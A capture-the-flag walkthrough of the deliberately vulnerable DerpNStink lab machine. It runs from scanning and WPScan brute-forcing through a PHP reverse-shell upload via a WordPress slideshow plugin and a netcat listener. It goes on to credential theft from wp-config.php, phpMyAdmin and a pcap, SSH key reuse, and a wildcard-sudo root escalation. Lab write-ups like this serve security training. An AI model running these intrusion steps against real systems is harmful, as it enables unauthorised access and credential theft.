DerpNStink
Mr. Derp and Uncle Stinky are two system administrators who are starting their own company, DerpNStink. Instead of hiring qualified professionals to build up their IT landscape, they decided to hack together their own system which is almost ready to go live…
URL: DerpNStink
Difficulty: Beginner
Author: Bryan Smith
Enumeration
Set up the Machine with a host-only adapter and run a net discover command to find the associated IP. My interface eth1 is Host-Only on my main OS (Kali Linux).
netdiscover -i eth1
The IP 192.168.56.103 has been found so we will do a port scan with the following IP:
nmap -sS -A -p- -o "nmap" 192.168.56.103
The first open port is the FTP. Sometimes users can log in as Anonymous with no password needed.
ftp 192.168.56.103 Anonymous
This was not possible so I will move onto enumerating the next port.
Port 80 is open so have a look on a browser. This is what the web page looks like:
Nothing obvious sticks out so look at the source code.
There is an interesting link worth checking in one of the < script > tags as shown below. There is a link to /webnotes/info.txt. Go to that directory.
There is a message to “stinky” (a possible user) to update the local hosts file with a local DNS so the blog website can be accessed. There was no blog seen initially so let’s go ahead and update our host file on our local machine. Before this, I want to just double-check what else we can find at /webnotes. This is a snippet of what is found:
A username [email protected] is mentioned. This is worth noting. There was also a mention of a robots.txt file in the nmap scan so let’s have a look at that as well:
Paths /php and /temporary are listed in this. Let’s check them out:
This seems to be a rabbit hole. Nothing to see here. Now let’s continue to updating our hosts file.
A hosts file is a plain text file that all operating systems use to translate hostnames into IP addresses. You can read more about this here.
Edit the /etc/hosts file with gedit or nano.
nano /etc/hosts
Add the machines IP address to a hostname.
192.168.56.103 derpnstink.local
This should now be accessible. You can visit the webpage and enumerate this further.
Use dirb (Web Content Scanner) to find more paths to this website to hopefully find the blog the users have been talking about.
dirb http://derpnstink.local/
Visit the link and there is a blog. According to the dirb results, there seems to be WordPress running. This is a snippet of my results:
Wordpress is one of the most popular website making tools which attracts lots of hackers. Let’s use the popular Wordpress Vulnerability scanner WPScan. Here is a link to their website.
Kali Linux should already have this installed so I will be executing the following command:
wpscan --url http://derpnstink.local/weblog/ -e u,vp,vt
-e refers to the enumeration option. u,vp and vt mean the scan will be looking for users, vulnerable plugins and vulnerable themes.
Some users have evidently been found: unclestinky and admin.
All the exploits given by WPScan seem to be authenticated which is not yet possible so we will look for a way to gain user access.
I will try bruteforcing since WPScan has an option for bruting passwords. This is the command:
wpscan --url http://derpnstink.local/weblog/ --passwords /usr/share/wordlists/rockyou.txt --username { user }
I have used the –passwords option to indicate a brute-forcing session. I have given a path to a passwords list and will provide a username after the –username parameter. I first tried unclestinky then admin.
After some time there were no results. I tried the default admin credentials which gave a successful login. For some reason, the rockyou.txt file didn’t contain “admin”.
User
Now that we have authenticated access, we can use an exploit given in the WPScan results. This exploit is ideal.
No need to use the code. Just create a .php payload to upload on the vulnerable slideshow vulnerability. There is a premade .php backdoor under the webshells directory on Kali Linux.
I copied this in my current directory with the following command:
locate webshells cp /usr/share/webshells/php/php-reverse-shell.php .
Edit the payload accordingly. Add your local IP address and a port you will be listening on.
nano php-reverse-shell.php
This is ready to upload to the slideshow plugin on Wordpress. Go to the WP web interface > slideshow and add your slide show.
Add in some information into the fields and upload your payload under “Choose Image”. Save the changes.
Before executing the payload, we need to listen on the chosen port. Set up a netcat session and listen on your specified port.
nc -nvlp 4444
Everything should be ready. Simply click on the slideshow you have just created to execute the payload. You can do this from the main “slideshow” page.
We have a reverse shell!
id pwd
We have a reverse shell with “www-data”. Upgrade the shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
In order to see other users on this system, we can have a look at /etc/passwd or simply look at the home directories in /home.
cd /home
There are 2 users, mrderp and stinky. Looking into stinky’s home directory, we find a Pastebin link: https://pastebin.com/RzK9WfGw
mrderp ALL=(ALL) /home/mrderp/binaries/derpy*
This is the sudo privileges that mrderp has. We need to get access to his account to exploit this.
If you are not familiar with Wordpress, credentials are kept in plaintext on a Wordpress configuration file named wp-config.php. Search for this file and look at the contents using cat.
locate wp-config.php cat /path/to/wp-config.php
A look at this file gives us some credentials.
These credentials are for the database. Let’s try these out. Go to /php/phpmyadmin.
The login is successful.
Earlier on when we scanned the Wordpress website, there was another user account. Let’s go to the Wordpress database and change the password to something we know so we can log into that account.
Go to wordpress > wp_users
As we know the password for the admin account, copy and paste the hash into unclestinky’s password field.
Now login into stinky’s account and see if we can find any more information.
There isn’t much to see here except for another flag under the posts section:
Let’s move onto other credentials. We are done with Wordpress. Going back to the phpmyadmin database, go to mysql > user for some hash passwords. We can crack some of these ourselves with John or just search them up.
I have used this website to try and find a password for unclestinky / [email protected]:
*9B776AFB479B31E8047026F1185E952DD1E530CB : wedgie57
The password wedgie57 has been found. Let’s attempt to change the user to stinky with su using the password we found.
su stinky
There is another flag in the Desktop directory of stinky.
cd stinky/Desktop ls -la cat flag.txt
Under the ftp/files/network-logs directory, there is a snapshot of a conversation between mrderp and stinky. There is a mention of a packet capture which is important as there may be a password in plaintext in there.
There is also an ssh directory under ftp. If you keep going into the ssh directories, there is a .txt file named key. This is a RSA Private key. Read more about it here. It is often used as a ‘key’ when connecting to a server via ssh.
In order to ssh with a private key, copy this key over to your local machine.
nano ssh -paste key- Ctl+x, y, Enter.
Before using this as a key, change the permissions by executing the following command:
chmod 700 ssh
You can read more about chmod and file permissions here.
ssh -i ssh [email protected]
The above code is used to connect to the host derpnstink.local with user stinky. ‘-i ssh’ parameter indicates the ssh file to be used. If your ssh key file has a different name, replace ‘-i ssh’ with ‘-i {file name}’.
A successful login. The ssh session is easier to work with.
Now in the documents is a pcap file. Let’s analyse this. A .pcap file is a file that has some network traffic recorded. Read more about this here. A popular tool to analyse pcap files is Wireshark.
However, I will be just analysing the strings in this file. ‘Strings’ prints the strings of printable characters in files. Read more about strings here. Hopefully, we can get some sort of password in plaintext from the .pcap file.
strings derpissues.pcap
Returns this:
There is far too many strings to go through. Although we could output it to a file and analyse more, let’s try grepping the results. In this case, I will use ‘grep “pass”’ to see if there is a password field captured in the network traffic. Read more about grep here.
strings derpissues.pcap | grep "pass"
The above command essentially finds all the strings in the .pcap file and only prints when there is a “pass” in the string. Here is the result:
As you can see, the second instance of “pass” looks good.
derpderpderpderpderpderpderp
To test out this password, change user to mrderp and use that password.
su mrderp id
A successful login.
Privilege Escelation
Now we have access to a user where we can start exploiting the sudo rights as mentioned before. A look at derp’s documents reveals an email he has saved which outlines a problem with a sudo file.
This could be referring to that Pastebin we saw earlier. Check the sudo rights of derp:
sudo-l
Mr derp is allowed to run sudo commands in the file location /home/mrderp/binaries/derpy*. As you can see in the screenshot, cd didn’t work so to exploit the sudo rights, let’s create a directory called binaries in /home/mrderp:
mkdir binaries cd binaries
In this case, anything named derpy* (where * means any) has sudo rights.
echo "/bin/bash" > derpy.sh
The above command is outputting “/bin/bash” into a file called derpy.sh. If this is executed, it will give derpy root privs. To execute this file, it must be made executable.
chmod +x derpy.sh
Now execute the file:
sudo ./derpy.sh id
The id command shows we are root. The flag will be located in /root.